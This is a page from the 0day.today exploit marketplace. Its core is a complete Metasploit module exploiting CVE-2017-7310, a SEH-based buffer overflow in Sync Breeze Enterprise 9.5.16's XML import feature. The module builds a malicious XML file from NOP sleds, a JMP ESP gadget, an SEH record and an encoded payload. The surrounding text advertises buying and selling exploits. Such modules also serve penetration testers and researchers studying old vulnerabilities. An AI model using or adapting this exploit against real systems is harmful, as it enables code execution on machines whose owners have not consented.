0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow Exploit
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow', 'Description' => %q( This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file. ), 'License' => MSF_LICENSE, 'Author' => [ 'Daniel Teixeira' ], 'References' => [ [ 'CVE', '2017-7310' ], [ 'EDB', '41773' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', 'DisablePayloadHandler' => 'true' }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27", 'StackAdjustment' => -3500 }, 'Targets' => [ ['Windows Universal', { 'Ret' => 0x10015FFE } ] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 29 2017', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The file name.', 'msf.xml']) ]) end def exploit jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76] jmp = "\xFF\xE0" # JMP ESP buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'" buffer << "\x90" * 1536 buffer << jmpesp buffer << "\x90" * 18 buffer << esp buffer << jmp buffer << "\x90" * 68 buffer << generate_seh_record(target.ret) buffer << "\x90" * 10 buffer << payload.encoded buffer << "\x90" * 5000 buffer << "\n</classify>" print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(buffer) end end # 0day.today [2024-11-15] #